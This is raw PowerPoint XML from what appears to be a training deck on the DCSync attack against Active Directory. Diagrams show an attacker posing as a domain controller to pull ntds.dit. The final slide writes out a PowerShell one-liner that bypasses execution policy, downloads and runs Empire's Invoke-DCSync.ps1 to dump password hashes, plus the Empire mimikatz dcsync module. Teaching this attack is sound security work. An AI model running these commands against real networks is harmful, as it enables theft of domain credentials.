              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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BF2669-C823-4867-80E3-3DD11023BE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818302" y="5678158"/>
            <a:ext cx="142782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 Steve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2DA99C-AF7D-47DB-B2AF-D061AAA82986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="1"/>
            <a:endCxn id="31" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="12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5912D-11C0-4175-B32F-68833B53FDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843304" y="3910818"/>
            <a:ext cx="141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Shell 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DFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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106674-7F52-41CC-A394-07B36C6AB91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="1"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5042270" y="4280150"/>
            <a:ext cx="985132" cy="1521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6F239C0-9BA1-4A03-B46A-6D94F7DBCD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2765124">
            <a:off x="5338133" y="4457118"/>
            <a:ext cx="1416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Logged On / Left Creds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E691EBB8-6B85-4A80-B058-D26977A9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0669" y="3634349"/>
            <a:ext cx="1291601" cy="1291601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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86E9CBE1-FD5A-45CE-AA18-D8654B77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24" y="3664706"/>
            <a:ext cx="1291601" cy="129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00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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p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tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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BF2669-C823-4867-80E3-3DD11023BE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818302" y="5678158"/>
            <a:ext cx="142782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 Steve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2DA99C-AF7D-47DB-B2AF-D061AAA82986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="1"/>
            <a:endCxn id="31" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="12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DFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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106674-7F52-41CC-A394-07B36C6AB91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="1"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5042270" y="4280150"/>
            <a:ext cx="985132" cy="1521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Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E691EBB8-6B85-4A80-B058-D26977A9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0669" y="3634349"/>
            <a:ext cx="1291601" cy="1291601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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86E9CBE1-FD5A-45CE-AA18-D8654B77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24" y="3664706"/>
            <a:ext cx="1291601" cy="12916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3EBC52-2659-4A03-8A7E-D1A291D42987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986559" y="3255415"/>
            <a:ext cx="290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impersonates or uses the DA credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30367551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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p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tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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BF2669-C823-4867-80E3-3DD11023BE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818302" y="5678158"/>
            <a:ext cx="142782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 Steve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2DA99C-AF7D-47DB-B2AF-D061AAA82986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1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="12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DFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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106674-7F52-41CC-A394-07B36C6AB91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042270" y="4280150"/>
            <a:ext cx="985132" cy="1521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86E9CBE1-FD5A-45CE-AA18-D8654B77B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624" y="3664706"/>
            <a:ext cx="1291601" cy="1291601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 20" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DA8269-D652-4E3E-BC70-89F5B5A38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0669" y="3606679"/>
            <a:ext cx="1291601" cy="12916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84FF1B-A7EB-472F-B245-B5C7E286B7F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986559" y="3255415"/>
            <a:ext cx="290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Attacker wants to look like a DC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211668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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p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BF2669-C823-4867-80E3-3DD11023BE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818302" y="5678158"/>
            <a:ext cx="142782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 Steve</a:t>
            </a:r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6DE1FED3-80A6-4961-AFA4-E09C451F7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5398" y="3018905"/>
            <a:ext cx="1291601" cy="1291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2DA99C-AF7D-47DB-B2AF-D061AAA82986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1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="12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DFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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106674-7F52-41CC-A394-07B36C6AB91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042270" y="4280150"/>
            <a:ext cx="985132" cy="1521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86E9CBE1-FD5A-45CE-AA18-D8654B77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24" y="3664706"/>
            <a:ext cx="1291601" cy="129160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A5C611-010A-4C5D-86D0-B0560C27A94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8697982" y="4125840"/>
            <a:ext cx="59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3EBC52-2659-4A03-8A7E-D1A291D42987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20975934">
            <a:off x="4290515" y="3321777"/>
            <a:ext cx="290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I’m an out of sync DC!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499B90-7FD1-452B-94DD-6DEDC69C2F3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042270" y="3664706"/>
            <a:ext cx="3443128" cy="615444"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1174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Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DA8269-D652-4E3E-BC70-89F5B5A3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0669" y="3606679"/>
            <a:ext cx="1291601" cy="129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962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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p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tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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BF2669-C823-4867-80E3-3DD11023BE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818302" y="5678158"/>
            <a:ext cx="142782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 Steve</a:t>
            </a:r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6DE1FED3-80A6-4961-AFA4-E09C451F7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5398" y="3018905"/>
            <a:ext cx="1291601" cy="1291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2DA99C-AF7D-47DB-B2AF-D061AAA82986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1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="12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DFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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106674-7F52-41CC-A394-07B36C6AB91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042270" y="4280150"/>
            <a:ext cx="985132" cy="1521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86E9CBE1-FD5A-45CE-AA18-D8654B77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24" y="3664706"/>
            <a:ext cx="1291601" cy="129160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A5C611-010A-4C5D-86D0-B0560C27A94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8697982" y="4125840"/>
            <a:ext cx="59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3EBC52-2659-4A03-8A7E-D1A291D42987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20975934">
            <a:off x="5956978" y="4110452"/>
            <a:ext cx="3502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Cool, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>heres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> everything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499B90-7FD1-452B-94DD-6DEDC69C2F3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042270" y="3664706"/>
            <a:ext cx="3443128" cy="615444"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1016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Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DA8269-D652-4E3E-BC70-89F5B5A3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0669" y="3606679"/>
            <a:ext cx="1291601" cy="129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31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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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BF2669-C823-4867-80E3-3DD11023BE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818302" y="5678158"/>
            <a:ext cx="1427824" cy="8433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 Steve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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6DE1FED3-80A6-4961-AFA4-E09C451F7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5398" y="3018905"/>
            <a:ext cx="1291601" cy="12916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2DA99C-AF7D-47DB-B2AF-D061AAA82986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1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30357"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="444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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="121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ADFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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106674-7F52-41CC-A394-07B36C6AB91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042270" y="4280150"/>
            <a:ext cx="985132" cy="15215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86E9CBE1-FD5A-45CE-AA18-D8654B77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624" y="3664706"/>
            <a:ext cx="1291601" cy="129160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A5C611-010A-4C5D-86D0-B0560C27A94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8697982" y="4125840"/>
            <a:ext cx="59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3EBC52-2659-4A03-8A7E-D1A291D42987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100758" y="3509274"/>
            <a:ext cx="242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Muhahahaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 20" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DA8269-D652-4E3E-BC70-89F5B5A38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0669" y="3606679"/>
            <a:ext cx="1291601" cy="129160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7BAA730-AEE8-4F67-8094-3D4EA06C96E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5042270" y="3664706"/>
            <a:ext cx="3443128" cy="615444"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="95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532DEF-6949-46E9-B7B9-94FFC4BB9781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20975934">
            <a:off x="5956978" y="4110452"/>
            <a:ext cx="3502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Cool, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>heres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> everything</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37911456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259649" y="1848552"/>
            <a:ext cx="11205124" cy="47188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b="1" dirty="0"/>
              <a:t>Raw:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(‘https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>EmpireProject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/Empire/master/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>module_source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/credentials/Invoke-DCSync.ps1'); Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>PWDumpFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>;“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>In Empire:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>usemodule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dcsync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
